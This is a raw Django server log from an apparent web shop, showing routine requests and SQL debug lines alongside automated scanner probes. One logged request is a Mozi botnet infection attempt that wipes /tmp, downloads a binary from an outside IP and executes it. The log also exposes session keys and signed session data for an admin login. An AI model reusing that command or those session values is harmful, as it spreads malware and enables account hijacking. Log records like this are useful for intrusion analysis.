[27/Dec/2019 20:05:08] "GET /cn/register HTTP/1.0" 404 6344 Not Found: /page/load/registration [27/Dec/2019 20:05:09] "GET /page/load/registration HTTP/1.0" 404 6377 Not Found: /page/load/registration [27/Dec/2019 20:05:09] "GET /page/load/registration HTTP/1.0" 404 6377 Not Found: /Custom/Reg [27/Dec/2019 20:05:09] "GET /Custom/Reg HTTP/1.0" 404 6341 Not Found: /Custom/Reg [27/Dec/2019 20:05:09] "GET /Custom/Reg HTTP/1.0" 404 6341 Not Found: /register.html [27/Dec/2019 20:05:09] "GET /register.html HTTP/1.0" 404 6350 Not Found: /register.html [27/Dec/2019 20:05:09] "GET /register.html HTTP/1.0" 404 6350 Not Found: /register.html [27/Dec/2019 20:05:09] "GET /register.html HTTP/1.0" 404 6350 Not Found: /register.html [27/Dec/2019 20:05:10] "GET /register.html HTTP/1.0" 404 6350 Not Found: /User/index.php/login/register [27/Dec/2019 20:05:10] "GET /User/index.php/login/register HTTP/1.0" 404 6398 Not Found: /User/index.php/login/register [27/Dec/2019 20:05:10] "GET /User/index.php/login/register HTTP/1.0" 404 6398 Not Found: /regpage.do [27/Dec/2019 20:05:10] "GET /regpage.do HTTP/1.0" 404 6341 Not Found: /regpage.do [27/Dec/2019 20:05:10] "GET /regpage.do HTTP/1.0" 404 6341 Not Found: /Home/Register [27/Dec/2019 20:05:10] "GET /Home/Register HTTP/1.0" 404 6350 Not Found: /Home/Register [27/Dec/2019 20:05:11] "GET /Home/Register HTTP/1.0" 404 6350 Not Found: /kaihu.jsp [27/Dec/2019 20:05:11] "GET /kaihu.jsp HTTP/1.0" 404 6338 Not Found: /kaihu.jsp [27/Dec/2019 20:05:11] "GET /kaihu.jsp HTTP/1.0" 404 6338 [27/Dec/2019 20:10:06] "GET / HTTP/1.0" 302 0 [27/Dec/2019 20:15:09] "GET / HTTP/1.0" 302 0 [27/Dec/2019 20:20:12] "GET / HTTP/1.0" 302 0 [27/Dec/2019 20:25:37] "GET / HTTP/1.0" 302 0 [27/Dec/2019 20:30:40] "GET / HTTP/1.0" 302 0 [27/Dec/2019 20:35:43] "GET / HTTP/1.0" 302 0 [27/Dec/2019 20:39:58] "GET / HTTP/1.0" 302 0 [27/Dec/2019 20:40:46] "GET / HTTP/1.0" 302 0 [27/Dec/2019 20:46:11] "GET / HTTP/1.0" 302 0 [27/Dec/2019 20:51:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 20:51:06,527 utils 2749 140297243715328 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'elgt0aksuou49jw9l1l0d2y2ju8kdzgg' LIMIT 1; args=('elgt0aksuou49jw9l1l0d2y2ju8kdzgg',) DEBUG 2019-12-27 20:51:06,530 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('elgt0aksuou49jw9l1l0d2y2ju8kdzgg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-10T20:51:06.528124+00:00'::timestamptz); args=('elgt0aksuou49jw9l1l0d2y2ju8kdzgg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 10, 20, 51, 6, 528124, tzinfo=)) [27/Dec/2019 20:51:06] "GET /login/?next=/ HTTP/1.0" 200 1786 [27/Dec/2019 20:51:14] "GET / HTTP/1.0" 302 0 [27/Dec/2019 20:56:16] "GET / HTTP/1.0" 302 0 [27/Dec/2019 21:01:32] "GET / HTTP/1.0" 302 0 [27/Dec/2019 21:10:04] "GET / HTTP/1.0" 302 0 [27/Dec/2019 21:15:07] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [27/Dec/2019 21:18:42] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /User/User_Favorite.asp [27/Dec/2019 21:18:44] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=208 HTTP/1.0" 404 6422 Not Found: /newslist.asp [27/Dec/2019 21:18:45] "GET /newslist.asp?type=4&id=1377 HTTP/1.0" 404 6366 [27/Dec/2019 21:20:09] "GET / HTTP/1.0" 302 0 [27/Dec/2019 21:27:33] "GET / HTTP/1.0" 302 0 [27/Dec/2019 21:32:36] "GET / HTTP/1.0" 302 0 [27/Dec/2019 21:37:39] "GET / HTTP/1.0" 302 0 [27/Dec/2019 21:47:08] "GET / HTTP/1.0" 302 0 [27/Dec/2019 21:47:32] "GET / HTTP/1.0" 302 0 [27/Dec/2019 21:52:34] "GET / HTTP/1.0" 302 0 [27/Dec/2019 21:57:37] "GET / HTTP/1.0" 302 0 [27/Dec/2019 22:03:18] "GET / HTTP/1.0" 302 0 [27/Dec/2019 22:10:04] "GET / HTTP/1.0" 302 0 [27/Dec/2019 22:15:06] "GET / HTTP/1.0" 302 0 [27/Dec/2019 22:20:09] "GET / HTTP/1.0" 302 0 [27/Dec/2019 22:28:14] "GET / HTTP/1.0" 302 0 [27/Dec/2019 22:33:17] "GET / HTTP/1.0" 302 0 [27/Dec/2019 22:34:54] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 22:34:55,121 utils 2749 140297243715328 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'k1navrdghvy81fi8gtg5slw92k2koe4f' LIMIT 1; args=('k1navrdghvy81fi8gtg5slw92k2koe4f',) DEBUG 2019-12-27 22:34:55,122 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('k1navrdghvy81fi8gtg5slw92k2koe4f', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-10T22:34:55.121697+00:00'::timestamptz); args=('k1navrdghvy81fi8gtg5slw92k2koe4f', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 10, 22, 34, 55, 121697, tzinfo=)) [27/Dec/2019 22:34:55] "GET /login/?next=/ HTTP/1.0" 200 1786 [27/Dec/2019 22:34:55] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [27/Dec/2019 22:34:55] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [27/Dec/2019 22:34:55] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [27/Dec/2019 22:34:56] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [27/Dec/2019 22:34:56] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [27/Dec/2019 22:34:56] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [27/Dec/2019 22:34:56] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [27/Dec/2019 22:38:20] "GET / HTTP/1.0" 302 0 [27/Dec/2019 22:48:16] "GET / HTTP/1.0" 302 0 [27/Dec/2019 22:53:18] "GET / HTTP/1.0" 302 0 [27/Dec/2019 22:58:21] "GET / HTTP/1.0" 302 0 [27/Dec/2019 23:03:36] "GET / HTTP/1.0" 302 0 [27/Dec/2019 23:10:04] "GET / HTTP/1.0" 302 0 [27/Dec/2019 23:15:07] "GET / HTTP/1.0" 302 0 [27/Dec/2019 23:23:03] "GET / HTTP/1.0" 302 0 [27/Dec/2019 23:28:20] "GET / HTTP/1.0" 302 0 [27/Dec/2019 23:33:23] "GET / HTTP/1.0" 302 0 [27/Dec/2019 23:38:26] "GET / HTTP/1.0" 302 0 [27/Dec/2019 23:43:29] "GET / HTTP/1.0" 302 0 [27/Dec/2019 23:48:30] "GET / HTTP/1.0" 302 0 [27/Dec/2019 23:49:42] "GET / HTTP/1.0" 302 0 [27/Dec/2019 23:54:45] "GET / HTTP/1.0" 302 0 [27/Dec/2019 23:59:47] "GET / HTTP/1.0" 302 0 [28/Dec/2019 00:04:57] "GET / HTTP/1.0" 302 0 [28/Dec/2019 00:10:13] "GET / HTTP/1.0" 302 0 [28/Dec/2019 00:15:16] "GET / HTTP/1.0" 302 0 [28/Dec/2019 00:20:18] "GET / HTTP/1.0" 302 0 [28/Dec/2019 00:25:21] "GET / HTTP/1.0" 302 0 [28/Dec/2019 00:30:46] "GET / HTTP/1.0" 302 0 [28/Dec/2019 00:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [28/Dec/2019 00:35:48] "GET / HTTP/1.0" 302 0 [28/Dec/2019 00:38:32] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://180.124.187.178:52583/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0" 301 0 [28/Dec/2019 00:40:51] "GET / HTTP/1.0" 302 0 [28/Dec/2019 00:45:54] "GET / HTTP/1.0" 302 0 [28/Dec/2019 00:55:52] "GET / HTTP/1.0" 302 0 [28/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [28/Dec/2019 01:11:55] "GET / HTTP/1.0" 302 0 [28/Dec/2019 01:16:57] "GET / HTTP/1.0" 302 0 [28/Dec/2019 01:22:00] "GET / HTTP/1.0" 302 0 [28/Dec/2019 01:27:02] "GET / HTTP/1.0" 302 0 [28/Dec/2019 01:33:25] "GET / HTTP/1.0" 302 0 [28/Dec/2019 01:38:28] "GET / HTTP/1.0" 302 0 [28/Dec/2019 01:43:31] "GET / HTTP/1.0" 302 0 [28/Dec/2019 01:48:34] "GET / HTTP/1.0" 302 0 [28/Dec/2019 01:54:06] "GET / HTTP/1.0" 302 0 [28/Dec/2019 01:59:09] "GET / HTTP/1.0" 302 0 [28/Dec/2019 02:05:02] "GET / HTTP/1.0" 302 0 [28/Dec/2019 02:10:12] "GET / HTTP/1.0" 302 0 [28/Dec/2019 02:15:15] "GET / HTTP/1.0" 302 0 [28/Dec/2019 02:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [28/Dec/2019 02:20:17] "GET / HTTP/1.0" 302 0 [28/Dec/2019 02:25:20] "GET / HTTP/1.0" 302 0 [28/Dec/2019 02:35:03] "GET / HTTP/1.0" 302 0 [28/Dec/2019 02:36:40] "GET / HTTP/1.0" 302 0 [28/Dec/2019 02:43:40] "GET / HTTP/1.0" 302 0 [28/Dec/2019 02:46:55] "GET /nmaplowercheck1577501204 HTTP/1.0" 301 0 [28/Dec/2019 02:46:55] "GET /HNAP1 HTTP/1.0" 301 0 DEBUG 2019-12-28 02:46:55,946 utils 2749 140297254205184 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'HNAP1'; args=('HNAP1',) Not Found: /HNAP1/ [28/Dec/2019 02:46:55] "GET /HNAP1/ HTTP/1.0" 404 1726 Not Found: /evox/about [28/Dec/2019 02:47:33] "GET /evox/about HTTP/1.0" 404 6340 [28/Dec/2019 02:48:43] "GET / HTTP/1.0" 302 0 [28/Dec/2019 02:54:17] "GET / HTTP/1.0" 302 0 [28/Dec/2019 02:59:20] "GET / HTTP/1.0" 302 0 [28/Dec/2019 03:00:12] "GET / HTTP/1.0" 302 0 [28/Dec/2019 03:05:03] "GET / HTTP/1.0" 302 0 [28/Dec/2019 03:10:06] "GET / HTTP/1.0" 302 0 [28/Dec/2019 03:16:25] "GET / HTTP/1.0" 302 0 [28/Dec/2019 03:21:28] "GET / HTTP/1.0" 302 0 [28/Dec/2019 03:25:54] "GET / HTTP/1.0" 302 0 [28/Dec/2019 03:26:30] "GET / HTTP/1.0" 302 0 [28/Dec/2019 03:31:33] "GET / HTTP/1.0" 302 0 [28/Dec/2019 03:37:59] "GET / HTTP/1.0" 302 0 [28/Dec/2019 03:43:01] "GET / HTTP/1.0" 302 0 [28/Dec/2019 03:48:04] "GET / HTTP/1.0" 302 0 [28/Dec/2019 03:52:31] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-28 03:52:31,438 utils 2749 140297254205184 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ufmzc4ukd5yr0cqxdvudkxbaf9p67gdq' LIMIT 1; args=('ufmzc4ukd5yr0cqxdvudkxbaf9p67gdq',) DEBUG 2019-12-28 03:52:31,440 utils 2749 140297254205184 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ufmzc4ukd5yr0cqxdvudkxbaf9p67gdq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-11T03:52:31.438780+00:00'::timestamptz); args=('ufmzc4ukd5yr0cqxdvudkxbaf9p67gdq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 11, 3, 52, 31, 438780, tzinfo=)) [28/Dec/2019 03:52:31] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Dec/2019 03:53:07] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [28/Dec/2019 03:57:18] "GET /proxy.php HTTP/1.0" 404 6346 [28/Dec/2019 03:58:10] "GET / HTTP/1.0" 302 0 [28/Dec/2019 04:05:02] "GET / HTTP/1.0" 302 0 [28/Dec/2019 04:10:05] "GET / HTTP/1.0" 302 0 [28/Dec/2019 04:18:57] "GET / HTTP/1.0" 302 0 [28/Dec/2019 04:24:00] "GET / HTTP/1.0" 302 0 [28/Dec/2019 04:24:26] "GET / HTTP/1.0" 302 0 [28/Dec/2019 04:24:35] "GET / HTTP/1.0" 302 0 [28/Dec/2019 04:24:47] "GET / HTTP/1.0" 302 0 [28/Dec/2019 04:29:02] "GET / HTTP/1.0" 302 0 [28/Dec/2019 04:34:15] "GET / HTTP/1.0" 302 0 [28/Dec/2019 04:39:18] "GET / HTTP/1.0" 302 0 [28/Dec/2019 04:44:20] "GET / HTTP/1.0" 302 0 [28/Dec/2019 04:49:23] "GET / HTTP/1.0" 302 0 [28/Dec/2019 04:54:26] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [28/Dec/2019 04:55:10] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /User/User_Favorite.asp [28/Dec/2019 04:55:12] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=209 HTTP/1.0" 404 6422 Not Found: /xyzx/SendMail.asp [28/Dec/2019 04:55:15] "GET /xyzx/SendMail.asp?ArticleID=327 HTTP/1.0" 404 6376 [28/Dec/2019 04:59:48] "GET / HTTP/1.0" 302 0 [28/Dec/2019 05:05:02] "GET / HTTP/1.0" 302 0 [28/Dec/2019 05:10:05] "GET / HTTP/1.0" 302 0 [28/Dec/2019 05:15:07] "GET / HTTP/1.0" 302 0 [28/Dec/2019 05:21:33] "GET / HTTP/1.0" 302 0 [28/Dec/2019 05:26:36] "GET / HTTP/1.0" 302 0 [28/Dec/2019 05:31:39] "GET / HTTP/1.0" 302 0 [28/Dec/2019 05:36:42] "GET / HTTP/1.0" 302 0 [28/Dec/2019 05:42:13] "GET / HTTP/1.0" 302 0 [28/Dec/2019 05:47:16] "GET / HTTP/1.0" 302 0 [28/Dec/2019 05:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [28/Dec/2019 05:52:19] "GET / HTTP/1.0" 302 0 [28/Dec/2019 05:57:22] "GET / HTTP/1.0" 302 0 [28/Dec/2019 06:05:03] "GET / HTTP/1.0" 302 0 [28/Dec/2019 06:10:05] "GET / HTTP/1.0" 302 0 [28/Dec/2019 06:15:08] "GET / HTTP/1.0" 302 0 [28/Dec/2019 06:22:50] "GET / HTTP/1.0" 302 0 [28/Dec/2019 06:25:02] "GET /whm-server-status HTTP/1.0" 301 0 [28/Dec/2019 06:27:53] "GET / HTTP/1.0" 302 0 [28/Dec/2019 06:32:56] "GET / HTTP/1.0" 302 0 [28/Dec/2019 06:38:05] "GET / HTTP/1.0" 302 0 [28/Dec/2019 06:42:12] "GET / HTTP/1.0" 302 0 [28/Dec/2019 06:43:07] "GET / HTTP/1.0" 302 0 [28/Dec/2019 06:48:10] "GET / HTTP/1.0" 302 0 [28/Dec/2019 06:53:13] "GET / HTTP/1.0" 302 0 [28/Dec/2019 06:58:16] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-28 07:02:47,868 utils 2749 140297254205184 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-28T07:02:47.858348+00:00'::timestamptz AND "django_session"."session_key" = '8hyn47cjuae89j7mbn5kpmybirz8ihda'); args=(datetime.datetime(2019, 12, 28, 7, 2, 47, 858348, tzinfo=), '8hyn47cjuae89j7mbn5kpmybirz8ihda') DEBUG 2019-12-28 07:02:47,870 utils 2749 140297254205184 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-28 07:02:47,901 utils 2749 140297254205184 (0.002) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-28 07:02:47,909 utils 2749 140297254205184 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-11T07:02:47.908576+00:00'::timestamptz WHERE "django_session"."session_key" = '8hyn47cjuae89j7mbn5kpmybirz8ihda'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 11, 7, 2, 47, 908576, tzinfo=), '8hyn47cjuae89j7mbn5kpmybirz8ihda') [28/Dec/2019 07:02:47] "GET / HTTP/1.0" 200 8208 [28/Dec/2019 07:02:48] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [28/Dec/2019 07:02:48] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [28/Dec/2019 07:02:48] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 Not Found: /robots.txt [28/Dec/2019 07:02:48] "GET /robots.txt HTTP/1.0" 404 6343 [28/Dec/2019 07:05:03] "GET / HTTP/1.0" 302 0 [28/Dec/2019 07:14:47] "GET / HTTP/1.0" 302 0 [28/Dec/2019 07:19:49] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [28/Dec/2019 07:21:53] "GET /wp-login.php HTTP/1.0" 404 6348 [28/Dec/2019 07:25:45] "GET / HTTP/1.0" 302 0 [28/Dec/2019 07:30:48] "GET / HTTP/1.0" 302 0 [28/Dec/2019 07:35:51] "GET / HTTP/1.0" 302 0 [28/Dec/2019 07:41:06] "GET / HTTP/1.0" 302 0 [28/Dec/2019 07:46:08] "GET / HTTP/1.0" 302 0 [28/Dec/2019 07:51:11] "GET / HTTP/1.0" 302 0 [28/Dec/2019 07:56:14] "GET / HTTP/1.0" 302 0 [28/Dec/2019 08:01:25] "GET / HTTP/1.0" 302 0 [28/Dec/2019 08:10:04] "GET / HTTP/1.0" 302 0 [28/Dec/2019 08:15:07] "GET / HTTP/1.0" 302 0 [28/Dec/2019 08:20:09] "GET / HTTP/1.0" 302 0 [28/Dec/2019 08:27:19] "GET / HTTP/1.0" 302 0 [28/Dec/2019 08:32:22] "GET / HTTP/1.0" 302 0 [28/Dec/2019 08:37:24] "GET / HTTP/1.0" 302 0 [28/Dec/2019 08:42:27] "GET / HTTP/1.0" 302 0 [28/Dec/2019 08:47:48] "GET / HTTP/1.0" 302 0 [28/Dec/2019 08:52:50] "GET / HTTP/1.0" 302 0 [28/Dec/2019 08:57:53] "GET / HTTP/1.0" 302 0 [28/Dec/2019 09:04:19] "GET / HTTP/1.0" 302 0 [28/Dec/2019 09:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [28/Dec/2019 09:10:04] "GET / HTTP/1.0" 302 0 [28/Dec/2019 09:15:07] "GET / HTTP/1.0" 302 0 [28/Dec/2019 09:20:09] "GET / HTTP/1.0" 302 0 Not Found: /register.do [28/Dec/2019 09:27:12] "GET /register.do HTTP/1.0" 404 6344 Not Found: /register.do [28/Dec/2019 09:27:12] "GET /register.do HTTP/1.0" 404 6344 DEBUG 2019-12-28 09:27:13,078 utils 2749 140297254205184 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'cl'; args=('cl',) Not Found: /cl/ [28/Dec/2019 09:27:13] "GET /cl/?module=System&method=MAdvertis&other= HTTP/1.0" 404 1767 DEBUG 2019-12-28 09:27:13,228 utils 2749 140297254205184 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'cl'; args=('cl',) Not Found: /cl/ [28/Dec/2019 09:27:13] "GET /cl/?module=System&method=MAdvertis&other= HTTP/1.0" 404 1767 Not Found: /entrance/page/registermember [28/Dec/2019 09:27:13] "GET /entrance/page/registermember HTTP/1.0" 404 6395 Not Found: /entrance/page/registermember [28/Dec/2019 09:27:13] "GET /entrance/page/registermember HTTP/1.0" 404 6395 [28/Dec/2019 09:27:13] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-28 09:27:13,781 utils 2749 140297254205184 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'w6jt100jtze2e823262xhas6xk7ot88h' LIMIT 1; args=('w6jt100jtze2e823262xhas6xk7ot88h',) DEBUG 2019-12-28 09:27:13,783 utils 2749 140297254205184 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('w6jt100jtze2e823262xhas6xk7ot88h', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-11T09:27:13.781688+00:00'::timestamptz); args=('w6jt100jtze2e823262xhas6xk7ot88h', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 11, 9, 27, 13, 781688, tzinfo=)) [28/Dec/2019 09:27:13] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Dec/2019 09:27:13] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-28 09:27:14,012 utils 2749 140297254205184 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '9s9t59taw40bqswr9r667q3z52th6qhz' LIMIT 1; args=('9s9t59taw40bqswr9r667q3z52th6qhz',) DEBUG 2019-12-28 09:27:14,014 utils 2749 140297254205184 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('9s9t59taw40bqswr9r667q3z52th6qhz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-11T09:27:14.013233+00:00'::timestamptz); args=('9s9t59taw40bqswr9r667q3z52th6qhz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 11, 9, 27, 14, 13233, tzinfo=)) [28/Dec/2019 09:27:14] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /hhcp/register.html [28/Dec/2019 09:27:14] "GET /hhcp/register.html HTTP/1.0" 404 6365 Not Found: /hhcp/register.html [28/Dec/2019 09:27:14] "GET /hhcp/register.html HTTP/1.0" 404 6365 [28/Dec/2019 09:27:14] "GET /Register HTTP/1.0" 301 0 DEBUG 2019-12-28 09:27:14,495 utils 2749 140297254205184 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'Register'; args=('Register',) Not Found: /Register/ [28/Dec/2019 09:27:14] "GET /Register/ HTTP/1.0" 404 1733 [28/Dec/2019 09:27:14] "GET /Register HTTP/1.0" 301 0 DEBUG 2019-12-28 09:27:14,706 utils 2749 140297254205184 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'Register'; args=('Register',) Not Found: /Register/ [28/Dec/2019 09:27:14] "GET /Register/ HTTP/1.0" 404 1733 [28/Dec/2019 09:27:14] "GET /PageRegister?uid= HTTP/1.0" 301 0 DEBUG 2019-12-28 09:27:14,915 utils 2749 140297254205184 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'PageRegister'; args=('PageRegister',) Not Found: /PageRegister/ [28/Dec/2019 09:27:14] "GET /PageRegister/?uid= HTTP/1.0" 404 1746 [28/Dec/2019 09:27:15] "GET /PageRegister?uid= HTTP/1.0" 301 0 DEBUG 2019-12-28 09:27:15,125 utils 2749 140297254205184 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'PageRegister'; args=('PageRegister',) Not Found: /PageRegister/ [28/Dec/2019 09:27:15] "GET /PageRegister/?uid= HTTP/1.0" 404 1746 Not Found: /cn/register [28/Dec/2019 09:27:15] "GET /cn/register HTTP/1.0" 404 6344 Not Found: /cn/register [28/Dec/2019 09:27:15] "GET /cn/register HTTP/1.0" 404 6344 Not Found: /page/load/registration [28/Dec/2019 09:27:15] "GET /page/load/registration HTTP/1.0" 404 6377 Not Found: /page/load/registration [28/Dec/2019 09:27:15] "GET /page/load/registration HTTP/1.0" 404 6377 Not Found: /Custom/Reg [28/Dec/2019 09:27:15] "GET /Custom/Reg HTTP/1.0" 404 6341 Not Found: /Custom/Reg [28/Dec/2019 09:27:15] "GET /Custom/Reg HTTP/1.0" 404 6341 Not Found: /register.html [28/Dec/2019 09:27:16] "GET /register.html HTTP/1.0" 404 6350 Not Found: /register.html [28/Dec/2019 09:27:16] "GET /register.html HTTP/1.0" 404 6350 Not Found: /register.html [28/Dec/2019 09:27:16] "GET /register.html HTTP/1.0" 404 6350 Not Found: /register.html [28/Dec/2019 09:27:16] "GET /register.html HTTP/1.0" 404 6350 Not Found: /User/index.php/login/register [28/Dec/2019 09:27:16] "GET /User/index.php/login/register HTTP/1.0" 404 6398 Not Found: /User/index.php/login/register [28/Dec/2019 09:27:16] "GET /User/index.php/login/register HTTP/1.0" 404 6398 Not Found: /regpage.do [28/Dec/2019 09:27:16] "GET /regpage.do HTTP/1.0" 404 6341 Not Found: /regpage.do [28/Dec/2019 09:27:17] "GET /regpage.do HTTP/1.0" 404 6341 Not Found: /Home/Register [28/Dec/2019 09:27:17] "GET /Home/Register HTTP/1.0" 404 6350 Not Found: /Home/Register [28/Dec/2019 09:27:17] "GET /Home/Register HTTP/1.0" 404 6350 